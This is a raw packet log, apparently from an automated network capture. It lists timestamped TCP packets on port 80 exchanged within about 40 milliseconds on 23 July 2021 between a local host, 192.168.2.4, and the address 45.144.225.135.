Jul 23, 2021 22:24:24.902451038 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902457952 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902482033 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902488947 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902498960 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902513981 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902525902 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902529001 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902546883 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902564049 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902570963 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902578115 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902594090 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902595043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902616978 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902630091 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902636051 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902653933 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902668953 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902669907 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902689934 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902705908 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902712107 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902734995 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902750969 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902756929 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902777910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902793884 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902796984 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902818918 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902829885 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902839899 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902859926 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902868032 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902877092 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902892113 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902900934 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902908087 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902929068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902939081 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902950048 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902971983 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902981043 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902992010 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903016090 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903022051 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903038025 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903059006 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903074980 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903079033 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903090954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903105974 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903109074 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903145075 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903148890 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903170109 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903188944 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903213024 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903213978 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903234959 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903253078 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903253078 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903275013 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903290033 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903295994 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903316021 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903328896 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903331995 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903347015 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903359890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903373003 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903374910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903389931 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903404951 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903405905 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903419971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903429985 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903439045 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903455019 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903462887 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903470039 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903491020 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903493881 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903511047 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903516054 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903527021 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903542995 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903558016 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903569937 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903574944 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903592110 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903605938 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903606892 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903620958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903626919 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903635979 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903650999 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903656006 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903665066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903681040 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903688908 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903698921 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903714895 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903723001 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903729916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903745890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903748035 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903760910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903769970 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903775930 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903790951 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903805971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903822899 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903824091 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903841019 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903855085 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903861046 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903871059 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903887033 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903888941 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903901100 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903914928 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903915882 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903929949 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903944969 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903948069 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903964996 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.903970003 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.903979063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.904010057 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.904236078 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.913989067 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.914017916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.914036036 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.914048910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.914064884 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.914071083 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.914089918 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.914098978 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.914107084 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.914124012 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.914140940 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.914151907 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.914158106 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.914185047 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.926318884 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926342964 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926361084 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926378965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926394939 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926410913 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926409006 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.926425934 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926440954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926445007 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.926456928 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926465988 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.926472902 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926491976 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.926492929 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926511049 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926526070 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926538944 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.926541090 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926557064 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926572084 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926587105 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926588058 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.926598072 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.926604986 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.926636934 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.928148031 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928169012 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928180933 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928193092 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928205013 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928225040 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928225040 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.928240061 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928256989 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928273916 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.928280115 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.928328991 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928344011 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928359985 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928366899 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.928375959 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928395033 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928401947 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.928412914 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928426027 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.928427935 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928443909 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928458929 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928474903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928477049 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.928489923 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928504944 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928507090 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.928524017 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928539038 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.928541899 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928556919 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928570986 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928577900 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.928582907 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928601027 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928608894 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.928618908 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928633928 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928642035 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.928649902 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928664923 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.928668022 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.928688049 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.933763981 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.933787107 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.933801889 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.933820009 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.933834076 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.933859110 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.933886051 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.933897972 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.933917999 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.933938980 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.933957100 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.933971882 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.933984041 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.933996916 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.934011936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.934035063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.934055090 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.934056997 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.934077024 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.934097052 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.934115887 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.934125900 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.934144974 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.934156895 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.934171915 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.934185982 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.936780930 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.936805964 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.936827898 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.936846018 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.936871052 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.936877012 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.936893940 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.936970949 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.937211037 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937313080 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937361002 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.937371016 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937398911 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937422991 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937450886 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.937450886 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937483072 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937514067 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937520027 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.937541962 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937572956 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937581062 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.937606096 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937638998 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937642097 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.937668085 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937695980 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937712908 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.937726974 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937757969 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937757969 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.937788010 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937819004 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937823057 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.937846899 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937866926 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.937880039 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937912941 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937939882 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.937944889 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937975883 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.937999964 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938008070 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938030958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938059092 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938059092 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938081026 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938111067 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938112020 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938134909 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938162088 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938163042 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938184977 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938209057 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938211918 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938231945 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938256979 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938258886 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938280106 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938308954 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938309908 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938333988 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938355923 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938359976 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938381910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938405037 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938409090 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938431025 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938456059 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938462973 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938491106 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938510895 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938528061 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938556910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938576937 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938587904 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938617945 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938646078 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938663006 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938674927 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938705921 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938733101 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938757896 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938766003 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938790083 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938796997 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938813925 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938826084 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938854933 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938884974 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938898087 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938915968 CEST	80	49750	45.144.225.135	192.168.2.4
